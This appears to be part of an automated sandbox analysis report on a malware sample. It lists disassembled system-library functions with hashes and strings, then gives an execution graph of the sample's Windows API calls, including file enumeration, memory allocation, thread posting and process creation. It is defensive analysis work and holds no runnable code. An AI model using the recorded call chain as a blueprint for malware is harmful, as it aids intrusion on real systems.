                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 3446177414-2283098728
                                                                                        • Opcode ID: 47e1f11f347f4b5e1fa2bb94795b2fa1ad597f12d16c324bebb4a4e868d808c9
                                                                                        • Instruction ID: dc5af9f83d2ff8a4a3d49eccfcf14dffa6825a899bec5c988a1681f936cdb8e6
                                                                                        • Opcode Fuzzy Hash: 47e1f11f347f4b5e1fa2bb94795b2fa1ad597f12d16c324bebb4a4e868d808c9
                                                                                        • Instruction Fuzzy Hash: E25105B1740302DFD725EF28C8C9BA9F7A1BB94718F14062DEB6587295E770A904CB91
                                                                                        Function 017CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 01807BAC
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01807B7F
                                                                                        • RTL: Resource at %p, xrefs: 01807B8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 0-871070163
                                                                                        • Opcode ID: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                                                                        • Instruction ID: 5a2b8700d80ca0c5a83a9a4779922a41d3f5936c0a56f32b8947b7a7f66ae4a7
                                                                                        • Opcode Fuzzy Hash: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                                                                        • Instruction Fuzzy Hash: 7041CF317047079BD721DE29CC51B6AB7E5EB98B10F000A1DFA9ADB780DB31E9058B92
                                                                                        Function 017CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180728C
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 018072C1
                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01807294
                                                                                        • RTL: Resource at %p, xrefs: 018072A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-605551621
                                                                                        • Opcode ID: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                                                                        • Instruction ID: 7050d5ca363e4ae562d84603a738396d11b9213e6a98642fd6bae2c3901d61db
                                                                                        • Opcode Fuzzy Hash: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                                                                        • Instruction Fuzzy Hash: 7341127160420AABC721CE29CC42B66F7A5FF94B50F10061CF996DB280DB30FA5687D1
                                                                                        Function 01842300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        • Opcode ID: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                                                                        • Instruction ID: 815873299e08316178778efd42b26061ff09c9749a755251a14a29620a59a8e0
                                                                                        • Opcode Fuzzy Hash: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                                                                        • Instruction Fuzzy Hash: C0314F72A0062D9FDB20DF2DDC44BAEB7F9EB54710F54455AF949E3244EF30AA448BA0
                                                                                        Function 01815F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Wow64 Emulation Layer
                                                                                        • API String ID: 3446177414-921169906
                                                                                        • Opcode ID: e92425b00fb183b4851d0c493e3a02d1769e9e62a282016d601296baea222603
                                                                                        • Instruction ID: 2c63ab462fc56035b23fb9bc067e943275343c0b297e91cfc60300445abd671b
                                                                                        • Opcode Fuzzy Hash: e92425b00fb183b4851d0c493e3a02d1769e9e62a282016d601296baea222603
                                                                                        • Instruction Fuzzy Hash: 7B212EB6A0021DBFAB019AA5CC98CBFBB7DEF85698F440058FA15E2104D6309F019B60
                                                                                        Function 01867CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 8d863959e45decf50d125baf614c2667077d8986ab04aacab619ee9ec1f3cf7d
                                                                                        • Instruction ID: 7c0a28360b6c2c86bdf729e1139bd41e20c91c26c7abf02ffce49fee203e0861
                                                                                        • Opcode Fuzzy Hash: 8d863959e45decf50d125baf614c2667077d8986ab04aacab619ee9ec1f3cf7d
                                                                                        • Instruction Fuzzy Hash: F3E17371A0030AEFDF15CFA8C845BEEBBB9BF44314F14852AE615E7284D770AA45CB90
                                                                                        Function 017BEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f3882ada78f21767d873ee51be14c264a2b3fc9405f498012da95168e9af29c
                                                                                        • Instruction ID: d5d1f7cb641f12aad73bc7178a11dd0ac763b719289dae033a992df68d940329
                                                                                        • Opcode Fuzzy Hash: 2f3882ada78f21767d873ee51be14c264a2b3fc9405f498012da95168e9af29c
                                                                                        • Instruction Fuzzy Hash: 15E1FE75D00608DFCB25CFA9C984AEDFBF1BF48714F24496AE946A7265DB30A941CF10
                                                                                        Function 0180EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 0f61dfdc04eb68fdb6d033c35bf734649c2531d1a4e3593b5eaed4ce7e670b0e
                                                                                        • Instruction ID: 33bb48d9214950d730a9e35c8b1ad8fa50fb57e5d48aea064432bd26d57d1283
                                                                                        • Opcode Fuzzy Hash: 0f61dfdc04eb68fdb6d033c35bf734649c2531d1a4e3593b5eaed4ce7e670b0e
                                                                                        • Instruction Fuzzy Hash: F1713771E0061D9FDF56CFA8CD84ADDBBB5BF48314F04802AEA05EB295D734AA05CB50
                                                                                        Function 0186A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 858d4a08e99cbe688b8b284befc535163c7b1dc4631e4ef84ed1972af102ead9
                                                                                        • Instruction ID: 11136b0adefaa322c5ec9a9497666e04a3e7b43808bb8fad78dddc850d54aa58
                                                                                        • Opcode Fuzzy Hash: 858d4a08e99cbe688b8b284befc535163c7b1dc4631e4ef84ed1972af102ead9
                                                                                        • Instruction Fuzzy Hash: 64517A34700A169FDB1CCE98C4A8A29B7F9FB89314B14416DEA06EB711DB74EE41CB80
                                                                                        Function 0180F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 4439e210911e9a378cc3d13fa3d7db74114f95da38a197e64e17d6e9dc9efa27
                                                                                        • Instruction ID: eec9c9da0078a07ecbd2b233c308ff6e86d7d1026d20ecb1562549ed9ae2cd89
                                                                                        • Opcode Fuzzy Hash: 4439e210911e9a378cc3d13fa3d7db74114f95da38a197e64e17d6e9dc9efa27
                                                                                        • Instruction Fuzzy Hash: 5B513775E0021D9FDF56CF98D845ADCBBB1BF88324F09812AEA05E7290D7349A01CF54
                                                                                        Function 017C7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                        • String ID:
                                                                                        • API String ID: 4281723722-0
                                                                                        • Opcode ID: b24e6b6be249631f7dd98baccee82376a66a20859b200d68cf287809576190ae
                                                                                        • Instruction ID: f161bdd098f13730d96b572a7277ab6ff1c8bdd82912fe38b60187088c00be9d
                                                                                        • Opcode Fuzzy Hash: b24e6b6be249631f7dd98baccee82376a66a20859b200d68cf287809576190ae
                                                                                        • Instruction Fuzzy Hash: C8312575E40619AFCF25DFA8E885AADBBF0BF48720F20412AE511F7294DB355A00CF54
                                                                                        Function 017959C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 74c4b7a38d7b339b511c03f2a193f816f2c5fc15007b4e2797f030e1fec786e6
                                                                                        • Instruction ID: b9894848f8c50240ee227e591be5a141335d02c89a7e830434e93a0f8acd6420
                                                                                        • Opcode Fuzzy Hash: 74c4b7a38d7b339b511c03f2a193f816f2c5fc15007b4e2797f030e1fec786e6
                                                                                        • Instruction Fuzzy Hash: E032397090426ADFDF26CF68D884BEDFBB5BB09304F0081EAE549A7241D7755A88CF91
                                                                                        Function 017D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-
                                                                                        • API String ID: 1302938615-2137968064
                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction ID: 7545df9eb6f2718606692a5f984381c105600b05939f10efcecd7f129ac1c82d
                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction Fuzzy Hash: 8291B271E0021E9BEB38DF6DC881ABEFBB1EF44328F54455AE955E72C4E73089818761
                                                                                        Function 017C4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0$Flst
                                                                                        • API String ID: 0-758220159
                                                                                        • Opcode ID: 2e38f4c93f542f385297a755961bfde10ec70d44fec241410d8a83963dce1f68
                                                                                        • Instruction ID: 89e5980d07dec6075b37964d5e2c94b58c2a5c5f92322491471637a3303325f6
                                                                                        • Opcode Fuzzy Hash: 2e38f4c93f542f385297a755961bfde10ec70d44fec241410d8a83963dce1f68
                                                                                        • Instruction Fuzzy Hash: BB517CB1E006188FDF26DF99C89866DFBF4FF44B14F14806EE54A9B291E7709985CB80
                                                                                        Function 0181CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0181CFBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8
                                                                                        • String ID: @$@4Qw@4Qw
                                                                                        • API String ID: 4062629308-2383119779
                                                                                        • Opcode ID: 58f35e462ad2deeb46e394931dc2af0da2d328db4991562e9701082839b9f733
                                                                                        • Instruction ID: 368f90694f14bd7c3ab1bc65662b192167b23919ac4f171f96d6d472d9d7cd1a
                                                                                        • Opcode Fuzzy Hash: 58f35e462ad2deeb46e394931dc2af0da2d328db4991562e9701082839b9f733
                                                                                        • Instruction Fuzzy Hash: 8F41B272940219DFCB21AFA9C884A6DFBF8FF54B40F10422AE915DB359E774CA01CB61
                                                                                        Function 0178DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: 0$0
                                                                                        • API String ID: 3446177414-203156872
                                                                                        • Opcode ID: 1b4bb92623bd51df31a4d4a8d48caa783ca4f10b01a0a9225b27c966c6ffd327
                                                                                        • Instruction ID: eaa5c1a4a0d120e7ebc8830a18f9d868873faeb1c82ea412e28c8104443e4aac
                                                                                        • Opcode Fuzzy Hash: 1b4bb92623bd51df31a4d4a8d48caa783ca4f10b01a0a9225b27c966c6ffd327
                                                                                        • Instruction Fuzzy Hash: 1C415BB16087069FD310DF68C484A1ABBE4BB8C318F144A6EF588DB341D771EA06CB96

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.5%
                                                                                        Dynamic/Decrypted Code Coverage:4.4%
                                                                                        Signature Coverage:2.3%
                                                                                        Total number of Nodes:433
                                                                                        Total number of Limit Nodes:71
                                                                                        execution_graph 100373 2a29ea0 100374 2a29eaf 100373->100374 100375 2a29ef0 100374->100375 100376 2a29edd CreateThread 100374->100376 100377 3122ad0 LdrInitializeThunk 100378 2a30fa0 100379 2a30fb9 100378->100379 100384 2a347a0 100379->100384 100381 2a30fd7 100382 2a31023 100381->100382 100383 2a31010 PostThreadMessageW 100381->100383 100383->100382 100385 2a347c4 100384->100385 100386 2a34800 LdrLoadDll 100385->100386 100387 2a347cb 100385->100387 100386->100387 100387->100381 100388 2a495e0 100389 2a49684 100388->100389 100391 2a49608 100388->100391 100390 2a4969a NtReadFile 100389->100390 100392 2a2b6b0 100395 2a4b7c0 100392->100395 100394 2a2cd21 100398 2a498d0 100395->100398 100397 2a4b7f1 100397->100394 100399 2a49965 100398->100399 100401 2a498fb 100398->100401 100400 2a4997b NtAllocateVirtualMemory 100399->100400 100400->100397 100401->100397 100402 2a3c870 100404 2a3c899 100402->100404 100403 2a3c99d 100404->100403 100405 2a3c943 FindFirstFileW 100404->100405 100405->100403 100407 2a3c95e 100405->100407 100406 2a3c984 FindNextFileW 100406->100407 100408 2a3c996 FindClose 100406->100408 100407->100406 100408->100403 100409 2a36ff0 100410 2a3701a 100409->100410 100413 2a38190 100410->100413 100412 2a37044 100414 2a381ad 100413->100414 100420 2a48eb0 100414->100420 100416 2a381fd 100417 2a38204 100416->100417 100425 2a48f90 100416->100425 100417->100412 100419 2a3822d 100419->100412 100421 2a48f4b 100420->100421 100423 2a48edb 100420->100423 100430 3122f30 LdrInitializeThunk 100421->100430 100422 2a48f84 100422->100416 100423->100416 100426 2a4903e 100425->100426 100428 2a48fbc 100425->100428 100431 3122d10 LdrInitializeThunk 100426->100431 100427 2a49083 100427->100419 100428->100419 100430->100422 100431->100427 100432 2a37570 100433 2a37588 100432->100433 100435 2a375e2 100432->100435 100433->100435 100436 2a3b4e0 100433->100436 100438 2a3b506 100436->100438 100437 2a3b73f 100437->100435 100438->100437 100463 2a49b60 100438->100463 100440 2a3b582 100440->100437 100466 2a4ca20 100440->100466 100442 2a3b5a1 100442->100437 100443 2a3b678 100442->100443 100472 2a48dc0 100442->100472 100446 2a35d90 LdrInitializeThunk 100443->100446 100447 2a3b697 100443->100447 100446->100447 100462 2a3b727 100447->100462 100484 2a48930 100447->100484 100448 2a3b60c 100448->100437 100456 2a3b63e 100448->100456 100458 2a3b660 100448->100458 100476 2a35d90 100448->100476 100450 2a38360 LdrInitializeThunk 100455 2a3b735 100450->100455 100455->100435 100499 2a44a40 LdrInitializeThunk 100456->100499 100457 2a3b6fe 100489 2a489e0 100457->100489 100480 2a38360 100458->100480 100460 2a3b718 100494 2a48b40 100460->100494 100462->100450 100464 2a49b7d 100463->100464 100465 2a49b8e CreateProcessInternalW 100464->100465 100465->100440 100467 2a4c990 100466->100467 100469 2a4c9ed 100467->100469 100500 2a4b930 100467->100500 100469->100442 100470 2a4c9ca 100503 2a4b850 100470->100503 100473 2a48ddd 100472->100473 100512 3122c0a 100473->100512 100474 2a3b603 100474->100443 100474->100448 100477 2a35daf 100476->100477 100478 2a48f90 LdrInitializeThunk 100477->100478 100479 2a35dce 100478->100479 100479->100456 100481 2a38373 100480->100481 100515 2a48cc0 100481->100515 100483 2a3839e 100483->100435 100485 2a489ad 100484->100485 100486 2a4895b 100484->100486 100521 31239b0 LdrInitializeThunk 100485->100521 100486->100457 100487 2a489d2 100487->100457 100490 2a48a5a 100489->100490 100492 2a48a08 100489->100492 100522 3124340 LdrInitializeThunk 100490->100522 100491 2a48a7f 100491->100460 100492->100460 100495 2a48b68 100494->100495 100496 2a48bba 100494->100496 100495->100462 100523 3122fb0 LdrInitializeThunk 100496->100523 100497 2a48bdf 100497->100462 100499->100458 100506 2a49a80 100500->100506 100502 2a4b94b 100502->100470 100509 2a49ad0 100503->100509 100505 2a4b869 100505->100469 100507 2a49a9d 100506->100507 100508 2a49aae RtlAllocateHeap 100507->100508 100508->100502 100510 2a49aed 100509->100510 100511 2a49afe RtlFreeHeap 100510->100511 100511->100505 100513 3122c11 100512->100513 100514 3122c1f LdrInitializeThunk 100512->100514 100513->100474 100514->100474 100516 2a48ceb 100515->100516 100517 2a48d3e 100515->100517 100516->100483 100520 3122dd0 LdrInitializeThunk 100517->100520 100518 2a48d63 100518->100483 100520->100518 100521->100487 100522->100491 100523->100497 100524 2a41a30 100525 2a41a4c 100524->100525 100526 2a41a74 100525->100526 100527 2a41a88 100525->100527 100528 2a49770 NtClose 100526->100528 100534 2a49770 100527->100534 100530 2a41a7d 100528->100530 100531 2a41a91 100537 2a4b970 RtlAllocateHeap 100531->100537 100533 2a41a9c 100535 2a4978a 100534->100535 100536 2a4979b NtClose 100535->100536 100536->100531 100537->100533 100538 2a49470 100539 2a49524 100538->100539 100541 2a4949c 100538->100541 100540 2a4953a NtCreateFile 100539->100540 100542 2a48bf0 100543 2a48c7f 100542->100543 100544 2a48c1b 100542->100544 100547 3122ee0 LdrInitializeThunk 100543->100547 100545 2a48cb0 100547->100545 100548 2a46330 100549 2a4638a 100548->100549 100550 2a46397 100549->100550 100552 2a43d30 100549->100552 100553 2a4b7c0 NtAllocateVirtualMemory 100552->100553 100554 2a43d71 100553->100554 100555 2a347a0 LdrLoadDll 100554->100555 100558 2a43e7e 100554->100558 100556 2a43db7 100555->100556 100557 2a43e00 Sleep 100556->100557 100556->100558 100557->100556 100558->100550 100559 2a48d70 100560 2a48d8a 100559->100560 100563 3122df0 LdrInitializeThunk 100560->100563 100561 2a48db2 100563->100561 100564 2a33343 100569 2a37fe0 100564->100569 100567 2a49770 NtClose 100568 2a3336f 100567->100568 100570 2a37ffa 100569->100570 100574 2a33353 100569->100574 100575 2a48e60 100570->100575 100573 2a49770 NtClose 100573->100574 100574->100567 100574->100568 100576 2a48e7a 100575->100576 100579 31235c0 LdrInitializeThunk 100576->100579 100577 2a380ca 100577->100573 100579->100577 100581 2a29f00 100582 2a2a222 100581->100582 100584 2a2a56b 100582->100584 100585 2a4b4b0 100582->100585 100586 2a4b4d6 100585->100586 100591 2a24150 100586->100591 100588 2a4b4e2 100589 2a4b51b 100588->100589 100594 2a458c0 100588->100594 100589->100584 100593 2a2415d 100591->100593 100598 2a33450 100591->100598 